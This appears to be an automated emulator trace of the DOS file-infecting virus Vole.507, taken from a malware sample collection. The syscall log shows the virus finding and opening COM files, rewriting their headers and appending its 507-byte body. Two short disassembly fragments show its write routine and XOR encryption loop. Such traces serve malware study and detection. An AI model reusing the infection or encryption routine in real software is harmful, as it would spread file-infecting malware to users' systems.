Sample viewer

vx.netlux.org/Virus.DOS.Vole.507

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:52:16.120737149Z 26 PC: 12aa0 | Set disk transfer address
2018-12-17T22:52:16.122761482Z 37 PC: 12aae | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:52:16.123876442Z 37 PC: 12ab2 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:52:16.125043365Z 78 PC: 12afe | Find first file
2018-12-17T22:52:16.130984285Z 61 PC: 12bcf | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:52:16.138248564Z 63 PC: 12bde | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:52:16.144158171Z 66 PC: 12bed | Move file pointer
2018-12-17T22:52:16.145433238Z 66 PC: 12bfc | Move file pointer
2018-12-17T22:52:16.14769997Z 64 PC: 12c08 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:52:16.151087916Z 66 PC: 12c14 | Move file pointer
2018-12-17T22:52:16.153276977Z 44 PC: 12c18 | Get time 0x12c18: mov byte ptr [bp + 0x1fb], dl
0x12c1c: call 0x12c32
0x12c1f: mov ah, 0x40
0x12c21: mov cx, 0x1fb
0x12c24: lea dx, word ptr [bp + 6]
0x12c28: int 0x21
0x12c2a: call 0x12c32
0x12c2d: mov ah, 0x3e
0x12c2f: int 0x21
0x12c31: ret
0x12c32: lea si, word ptr [bp + 0x33]
0x12c36: mov cx, 0x1a9
0x12c39: xor byte ptr [si], 0
0x12c3c: inc si
0x12c3d: dec cx
0x12c3e: jne 0x12c39
0x12c40: ret
0x12c41: add word ptr [bx], di
0x12c43: aas
0x12c44: aas
2018-12-17T22:52:16.156340193Z 64 PC: 12c2a | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:52:16.333634872Z 62 PC: 12c31 | Close file
2018-12-17T22:52:16.342026652Z 79 PC: 12afe | Find next file
2018-12-17T22:52:16.345007982Z 61 PC: 12bcf | Open file (Filename = 'PRINT.COM')
2018-12-17T22:52:16.352043094Z 63 PC: 12bde | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:52:16.358829214Z 66 PC: 12bed | Move file pointer
2018-12-17T22:52:16.360110632Z 66 PC: 12bfc | Move file pointer
2018-12-17T22:52:16.361338088Z 64 PC: 12c08 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:52:16.364324419Z 66 PC: 12c14 | Move file pointer
2018-12-17T22:52:16.365678691Z 44 PC: 12c18 | Get time 0x12c18: mov byte ptr [bp + 0x1fb], dl
0x12c1c: call 0x12c32
0x12c1f: mov ah, 0x40
0x12c21: mov cx, 0x1fb
0x12c24: lea dx, word ptr [bp + 6]
0x12c28: int 0x21
0x12c2a: call 0x12c32
0x12c2d: mov ah, 0x3e
0x12c2f: int 0x21
0x12c31: ret
0x12c32: lea si, word ptr [bp + 0x33]
0x12c36: mov cx, 0x1a9
0x12c39: xor byte ptr [si], 0x3c
0x12c3c: inc si
0x12c3d: dec cx
0x12c3e: jne 0x12c39
0x12c40: ret
0x12c41: add word ptr [bx], di
0x12c43: aas
0x12c44: aas
2018-12-17T22:52:16.368418446Z 64 PC: 12c2a | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:52:16.377705796Z 62 PC: 12c31 | Close file
2018-12-17T22:52:16.390685542Z 26 PC: 12b18 | Set disk transfer address
2018-12-17T22:52:16.391927523Z 9 PC: 12b24 | Display string (Could not find end pointer)
2018-12-17T22:52:16.404105883Z 9 PC: 12b39 | Display string (String= ' Inherit the Wind !!! ')